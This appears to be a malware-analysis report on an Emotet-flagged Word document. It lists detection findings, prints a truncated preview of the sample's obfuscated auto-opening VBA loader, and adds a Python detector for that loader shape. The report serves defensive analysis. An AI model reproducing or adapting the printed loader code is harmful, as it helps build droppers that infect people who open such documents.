Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1071.001 Application Layer Protocol: Web Protocols
ClamAV identifies the sample with an Emotet downloader signature (Doc.Downloader.Emotet-10001946-0). Heuristics find an obfuscated auto-executing VBA loader (an AutoOpen procedure) that assembles its strings at runtime and passes them to GetObject and other execution sinks, which strongly suggests it downloads and executes a second-stage payload. The VBA macros are the primary mechanism for this malicious activity; the only URL extracted from the document is an Office Open XML schema namespace, not a download location, so the second-stage URL is not visible in the macro text.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-10001946-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. In this sample the strings are read from MSForms TextBox controls declared on the module (C41355.N6111574 + C41355.z_6296_6 + ...), so the sink argument cannot be recovered from the VBA text alone; the UserForm storage has to be dumped to see it.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro. Here it is declared as Sub autoopen() with the procedure name split across line continuations, which defeats naive single-line grep for "Sub AutoOpen".
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that a VBA project was in fact recovered for this sample (macros.bas below), so this marker adds nothing beyond the VBA findings here.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace that Office writes into every document with drawing content, not a payload URL.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9079 bytes | 410ee80eb334a4c731b5d126b46c1f93aec566541f9acaa4ccdd74386890c17e |

Preview of the extracted script (first 1,000 lines; truncated below):
Attribute VB_Name = "C41355"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "p479940, 0, 0, MSForms, TextBox"
Attribute VB_Control = "z_6296_6, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Q_9934, 2, 2, MSForms, TextBox"
Attribute VB_Control = "L586445, 3, 3, MSForms, TextBox"
Attribute VB_Control = "U3162544, 4, 4, MSForms, TextBox"
Attribute VB_Control = "N6111574, 5, 5, MSForms, TextBox"
Attribute VB_Name = "h5_876_"
Attribute VB_Name = "u977642"
Function j50187(P396241)
While E637531_ _
And _
z6883220
d7794043 = "K222412"
N69_340 = "F0528546"
Q6_9606 = "833382143"
P2_2553 = "813939108"
V557283 = "n90388_"
Wend
While J939_0 _
And _
w0_93_
B2058870 = "s25_3_"
l44336 = "Z5_30_8"
p268634 = "849633288"
E81819_3 = "563013670"
z5543309 = "X2759573"
Wend
Set j50187 = CVar(P396241)
While r2_29995 _
And _
Y0972_
K20625 = "S76758"
z426_6 = "q55_38_"
G9404173 = "627235485"
s48957 = "614544410"
G3985881 = "i7173_24"
Wend
While W3312_1 _
And _
O2715932
X1811_ = "O887361"
j943232 = "A37058"
j6822265 = "749785511"
j_2_33 = "521213248"
z40711_ = "T4_66075"
Wend
While L4669418 _
And _
j70500
i61663 = "v8286705"
Z38000_ = "a33070"
A08934 = "822617055"
c_81869 = "273596095"
i98272_ = "l9701596"
Wend
End Function
Sub _
_
_
autoopen()
On Error Resume Next
While A73890 _
And _
P5285__3
d520432 = "B9941630"
h13672_ = "B0592457"
P17515 = "994401364"
C23289 = "671879029"
w79594 = "i1718_58"
Wend
While M96158 _
And _
C613_900
P35_7808 = "l90837_9"
V48732 = "C4268791"
K02808 = "168230370"
S1492495 = "22061743"
j6308683 = "t2_877"
Wend
While B68171 _
And _
d5262_7
X4244934 = "U188217"
z16_8819 = "v752375"
l9683804 = "919772961"
Y75908_5 = "426907968"
C3959_ = "F969016"
Wend
L8942331
While C896457_ _
And _
H82967
E33592_ = "D786_514"
z976334_ = "d31776"
i077_56 = "381557287"
J3158_3 = "867820558"
E3635450 = "v63770"
Wend
While E21_961 _
And _
U642445
w2665521 = "n6808944"
S1_3_45 = "L9791042"
k08014_9 = "595952756"
z1926_3 = "262428734"
z95533 = "C579618"
Wend
While k267_02 _
And _
Y9581585
a2671343 = "t94577"
v4995_0 = "j2_0_323"
c55772 = "975880155"
Z126__64 = "962471819"
Z8348213 = "I244036"
Wend
End Sub
Attribute VB_Name = "F197993_"
Function L8942331()
On Error Resume Next
While i36869 _
And _
l_039449
M38537 = "Q377510"
Q361_249 = "B419470"
h4___3 = "456836531"
G69597 = "964266366"
H32576 = "A363_626"
Wend
While D806384 _
And _
X2_92326
w408222 = "c603265"
j3850672 = "T67_356"
D842_0 = "425744602"
w038940 = "842110806"
a511794 = "d7076352"
Wend
b94_1494 = C41355.N6111574 + C41355.z_6296_6 + C41355.N6111574 + C41355.Q_9934 + C41355.N6111574 + C41355.N6111574 + C41355.L586445 + C41355.N6111574 + C41355.N6111574 + C41355.U3162544 + C41355.N6111574 + C41355.p479940 + C41355.N6111574
While X6919_3 _
And _
i52517
z560019 = "t590782"
A0232128 = "b_7069"
r776113 = "48777659"
O19_64 = "583332642"
... (truncated)
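As an added example (not the analyzer's own logic and not code from the carved sample), the following Python script implements the checks behind the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_AUTOOPEN findings on the macro shape shown in the preview: it joins VBA line continuations so the split `Sub _ / _ / autoopen()` is recognised as an auto-exec entry, discards the While/Wend padding loops whose conditions only name never-assigned (Empty) variables, and then reports auto-exec procedures, execution sinks, and reads of MSForms control values of the kind in `b94_1494 = C41355.N6111574 + ...`. The input is a constructed excerpt modeled on the preview, not macros.bas itself, and the AUTOEXEC and SINK lists are the author's assumptions rather than the analyzer's rule set.

```python
import re

# Constructed excerpt modeled on the macro preview above; it is NOT the carved
# macros.bas. It keeps the shapes that matter: the Sub name split across line
# continuations, dead While/Wend padding, form-control concatenation, a COM sink.
SAMPLE_VBA = '''Attribute VB_Name = "C41355"
Attribute VB_Control = "p479940, 0, 0, MSForms, TextBox"
Attribute VB_Control = "z_6296_6, 1, 1, MSForms, TextBox"
Attribute VB_Control = "N6111574, 5, 5, MSForms, TextBox"
Sub _
_
_
autoopen()
On Error Resume Next
While A73890 _
And _
P5285__3
d520432 = "B9941630"
P17515 = "994401364"
Wend
L8942331
End Sub
Function L8942331()
On Error Resume Next
While r2_29995 _
And _
Y0972_
K20625 = "S76758"
Wend
b94_1494 = C41355.N6111574 + C41355.z_6296_6 + C41355.p479940
Set j = GetObject(b94_1494)
End Function
'''

# Assumed lists (author's choice, not the analyzer's): common Office auto-exec
# procedure names and the COM/shell/download sinks worth flagging.
AUTOEXEC = {"autoopen", "auto_open", "autoexec", "autoclose", "autoexit", "autonew",
            "document_open", "document_close", "workbook_open", "workbook_close"}
SINK = re.compile(r"\b(GetObject|CreateObject|Shell|ShellExecute|Run|Exec|"
                  r"XMLHTTP|URLDownloadToFile)\b", re.I)
# ' _' before a newline (or a bare '_' at line start) is a continuation; an
# underscore glued to an identifier (Y0972_) is not.
CONT = re.compile(r"(?:^|[ \t])_[ \t]*\r?\n", re.M)
ASSIGN_LIT = re.compile(r'^\s*[A-Za-z_]\w*\s*=\s*"[^"]*"\s*$')
ASSIGN_ANY = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=", re.I)
WHILE = re.compile(r"^\s*While\b(.*)$", re.I)
WEND = re.compile(r"^\s*Wend\b", re.I)
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")
VBA_WORDS = {"and", "or", "not", "xor", "true", "false", "empty", "nothing"}


def join_continuations(src):
    """Collapse VBA line continuations so 'Sub _ / _ / autoopen()' reads 'Sub autoopen()'."""
    return CONT.sub(" ", src)


def assigned_names(lines):
    """Every identifier that ever appears on the left of an assignment."""
    return {m.group(1).lower() for m in map(ASSIGN_ANY.match, lines) if m}


def strip_dead_loops(lines):
    """Drop While...Wend blocks whose condition names only variables that are never
    assigned (they stay Empty, so the test is False and the body never runs) and whose
    body is nothing but <name> = "literal". Returns (remaining_lines, dropped_count)."""
    assigned = assigned_names(lines)
    out, dropped, i = [], 0, 0
    while i < len(lines):
        m = WHILE.match(lines[i])
        if m:
            cond = {n.lower() for n in IDENT.findall(m.group(1))} - VBA_WORDS
            j = i + 1
            while j < len(lines) and ASSIGN_LIT.match(lines[j]):
                j += 1
            if cond and not (cond & assigned) and j < len(lines) and WEND.match(lines[j]):
                dropped += 1
                i = j + 1
                continue
        out.append(lines[i])
        i += 1
    return out, dropped


def analyze(src):
    """Report the loader shape: auto-exec entry, sinks, and form-control reads."""
    lines, dropped = strip_dead_loops(join_continuations(src).splitlines())
    clean = "\n".join(lines)
    procs = re.findall(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)\s*\(",
                       clean, re.M | re.I)
    controls = dict(re.findall(r'Attribute VB_Control = "(\w+), \d+, \d+, MSForms, (\w+)"', clean))
    # <module>.<control> reads: the strings live in the UserForm storage, not in the
    # macro text, which is why no URL or CreateObject literal shows up in the source.
    control_reads = sorted({c for _, c in re.findall(r"\b(\w+)\.(\w+)\b", clean) if c in controls})
    sinks = sorted({s.lower() for s in SINK.findall(clean)})
    autoexec = sorted(p.lower() for p in procs if p.lower() in AUTOEXEC)
    literal_arg = re.search(r'\b(?:GetObject|CreateObject|Shell)\s*\(\s*"', clean, re.I) is not None
    verdict = ("obfuscated auto-exec loader" if autoexec and sinks and control_reads
               else "auto-exec with sink" if autoexec and sinks else "no loader shape")
    return {"dead_loops_removed": dropped, "autoexec": autoexec, "sinks": sinks,
            "form_control_reads": control_reads, "sink_args_literal": literal_arg,
            "verdict": verdict}


if __name__ == "__main__":
    for k, v in analyze(SAMPLE_VBA).items():
        print(f"{k}: {v}")
```

To run it against the real artifact, feed it the decoded source that olevba emits for the document (`olevba -c sample.doc`, or the carved macros.bas above); the dead-loop count will be much higher than in the excerpt. The form-control reads it lists are the place to look next: olevba's form-string output (the TextBox contents stored in the UserForm streams) is where the string handed to GetObject is actually assembled from, and that, not the macro text, is where any URL or COM moniker should be expected.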